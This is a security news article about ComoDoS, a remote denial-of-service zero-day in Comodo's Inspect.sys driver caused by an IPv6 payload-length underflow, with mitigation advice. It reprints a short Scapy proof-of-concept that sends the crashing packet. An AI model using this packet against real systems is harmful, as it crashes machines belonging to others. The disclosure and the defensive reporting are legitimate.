A remotely exploitable zero-day vulnerability in Comodo Internet Security’s kernel-level firewall driver allows attackers to crash Windows systems with a single IPv6 packet, and the vendor has yet to respond.
Security researcher Marcus Hutchins publicly disclosed a critical zero-day vulnerability in Comodo Internet Security on June 3, 2026, after multiple attempts to reach the vendor failed.
Dubbed ComoDoS, the flaw resides in Inspect.sys, Comodo’s firewall kernel driver, and enables a remote Denial-of-Service (DoS) attack capable of triggering a Blue Screen of Death (BSOD) on targeted Windows machines.
How the Vulnerability Works
The bug originates in the IPv6 extension header parser inside Inspect.sys. When processing incoming IPv6 packets, the driver stores the packet’s payload length in a variable (packet_desc->payload_length). This value is entirely under the attacker’s control via the IPv6 fixed header’s payload length field.
As the parser iterates through IPv6 extension headers, it subtracts each header’s length from packet_desc->payload_length. Critically, the driver never validates the payload length field. If an attacker sets the payload length to a value smaller than the total extension header size, the unsigned 64-bit integer underflows and wraps around to approximately 18 quintillion (0xFFFFFFFFFFFFFFF8).
Because the vulnerability exists in the firewall driver itself, the malicious packet is parsed before any firewall rules are enforced — meaning the attack works even if the firewall is configured to block all ports.
The Proof-of-Concept
Hutchins released the full PoC, named ComoDoS, on GitHub. The exploit is remarkably compact:
ext = IPv6ExtHdrDestOpt(nh=6, options=[PadN(optdata=b"x00" * 8)])
tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000)
ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8)
pkt = ipv6 / ext / tcp
send(packet)A single malformed IPv6 packet is enough to crash the target system. Hutchins used the “Destination Options” extension header (nh=60) specifically because it is the least likely to be dropped by intermediate routers, making remote exploitation more reliable.
While the integer underflow also triggers an out-of-bounds (OOB) read and a reachable OOB write primitive, Hutchins assessed that remote code execution (RCE) is unlikely.
The OOB read is constrained by a WebDAV artifact scanner that terminates early when it encounters standard HTTP headers. The OOB write, meanwhile, uses a memcpy operation with the corrupted size value truncated to 32 bits, resulting in a guaranteed 4 GB kernel pool overflow that crashes the system before any code can execute.
Hutchins submitted a full report, root-cause analysis, patch recommendations, and the PoC to Comodo’s security team, but received no response, even after two follow-ups. Comodo also has no public bug bounty program.
A prior ZDI advisory (ZDI-24-953) noted that the same vendor ignored patch requests for nearly two years, establishing a troubling pattern of unresponsiveness.
No official patch is available. Organizations running Comodo Internet Security should monitor for anomalous IPv6 traffic at the network perimeter and consider blocking IPv6 extension headers, particularly Destination Options (Next Header = 60), at edge devices until Comodo issues a fix.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
